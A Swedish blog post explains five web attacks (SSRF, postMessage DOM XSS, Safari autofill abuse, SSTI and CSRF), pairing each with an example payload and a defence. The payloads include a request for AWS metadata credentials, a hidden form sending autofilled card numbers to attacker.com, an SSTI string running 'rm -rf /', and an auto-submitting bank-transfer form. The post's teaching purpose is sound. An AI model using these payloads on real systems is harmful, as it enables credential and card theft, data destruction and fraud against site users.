Skip to main content
  1. Blogposts/

Dom xss m.m ✏️

·664 words·4 mins· loading · loading · ·
Rasmus
Author
Rasmus
Att dela en ide eller två kan vara bra för hjärnan
Table of Contents

🔒 Webbsäkerhet: De Osynliga Hoten Som Kan Sänka Din Plattform (Och Hur Du Bekämpar Dem) 🔒

Hej kära läsare! 👋 Tänk dig att din webbplats är en fästning. Murarna är höga, vallgraven är djup – men vad händer om angripare smyger in genom en hemlig tunnel du inte ens visste fanns? Idag granskar vi tre farliga säkerhetshål och deras uppgraderade versioner som skickliga hackare kan utnyttja. 💥 Låt oss diskutera varför dessa sårbarheter är så allvarliga – och hur du blir din egen digitala riddare! 🛡️

🎯 Del 1: När Din Server Litar Blindt På Främlingar
#

1. Server-Side Request Forgery (SSRF) via URL-fetching API
#

Attacken i ett nötskal: Föreställ dig att din server är en lojal hund som hämtar precis vad du ber om. Men om en angripare ger den en adress till hundgodisbutiken (läs: din interna metadata), springer den glatt dit – och läcker känsliga nycklar. 🐕💨

Exempel på payload:

GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials HTTP/1.1
Host: vulnerableapp.com

Förklaring: Här lurar angriparen servern att hämta AWS-metadata, inklusive säkerhetsnycklar. Det är som att ge en främling din plånbok och nycklarna till ditt hus.

Så skyddar du dig:

  • Filtrera alla URL:er – låt inte servern kommunicera med interna IP:er.
  • Använd en proxy som fungerar som en “vaktmästare” som kontrollerar vart servern får gå.

🎯 Del 2: DOM XSS – När Meddelanden Blir Fällor
#

2. DOM XSS via postMessage utan origin-validering
#

Attacken i en bild: Din webbapp är som ett öppet fönster. En angripare skickar ett “meddelande” (t.ex. en falsk present) som innehåller en sprängladdning. Utan att kolla avsändaren exploderar presenten – och din säkerhet kraschar. 💣

Exempel på payload:

<iframe src="https://example.com/dashboard" id="frame"></iframe>
<script>
  document.getElementById('frame').contentWindow.postMessage(
    '<img src=x onerror=alert(1)>',
    'https://example.com/dashboard'
  );
</script>

Förklaring: Det här skriptet skickar en <img> som kraschar och kör alert(1) – en klassisk XSS-test. I verkligheten kan detta stjäla cookies eller sprida skadlig kod.

Så skyddar du dig:

  • Validera alltid avsändarens origin – som att kolla leg innan någon får komma in på festen.
  • Använd textContent istället för innerHTML för att undvika oönskad kodkörning.

🎯 Del 3: Autofyllnad – Safari-användarens Bästa Fiende
#

3. Autofill Abuse via Dolda Formulärfält
#

Attacken i en metafor: Tänk dig att Safari är en entusiastisk assistent som fyller i alla formulärfält automatiskt. Men om en angripare gömmer ett fält för kreditkortsnummer, fyller assistenten glatt i det – och skickar det rakt till hackaren. 💳👻

Exempel på payload:

<form action="https://attacker.com/capture" method="post">
  <input type="text" style="height:0px; overflow:hidden" autocomplete="cc-number">
  <input type="submit" value="Klicka här för en gratis present!">
</form>

Förklaring: Användaren ser en oskyldig knapp, men när de klickar skickas deras autofyllda kreditkortsnummer till en angripare.

Så skyddar du dig:

  • Stäng av autocomplete för känsliga fält: <input autocomplete="off">.
  • Varna användare om risken med autofyllnad – kunskap är din bästa vapen!

🔥 Bonus: Fler Exploits att Hålla Koll På
#

1.1 Server-Side Template Injection (SSTI)
#

Exempel:

{{ self.__init__.__globals__.['os'].popen('rm -rf /').read() }}

Effekt: Raderar hela serverns filsystem. 😱 Motåtgärd: Använd mallmotorer som automatiskt escapar användardata.

2.1 CSRF med Origin Bypass
#

Payload-trick:

<form action="https://bank.com/transfer" method="POST">
  <input type="hidden" name="amount" value="1000000">
  <input type="hidden" name="to" value="hacker_account">
</form>
<script>document.forms[0].submit();</script>

Förklaring: Om användaren är inloggad på bank.com och öppnar denna sida, skickas pengar automatiskt. 🏦 Motåtgärd: Använd CSRF-tokens – varje gång.

🛡️ Slutsats: Bli En Säkerhetsmästare
#

Säkerhet handlar inte om paranoia – utan om proaktivitet. Varje kodrad du skriver, varje API du designar, är en potentiell barriär mot attacker.

3 Åtgärder Du Kan Göra Idag:

  1. Testa dina API:er med verktyg som Postman eller Burp Suite.
  2. Granska dina formulär – har något fält autocomplete="cc-number" som inte borde finnas?
  3. Uppdatera dina bibliotek – gamla versioner är som inbjudningar till hackare.

Kom ihåg: En hackare behöver bara lyckas en gång. Du måste lyckas varje dag. 💪

Vad gör du för att skydda din webbplats? Dela dina bästa tips i kommentarerna – tillsammans bygger vi ett säkrare internet! 🌐✨

“It takes 20 years to build a reputation and few minutes of cyber-incident to ruin it.” – Stephane Nappo. Låt inte det hända dig. 🔥

Related

💥 bypassa csp: när säkerhetspolicyer inte räcker till
·441 words·3 mins· loading · loading
🔐💣📂 tre farliga säkerhetsbrister: ssrf, redos & xxe – en praktisk guide
·570 words·3 mins· loading · loading
🌟 Sårbarheter i iframes
·438 words·3 mins· loading · loading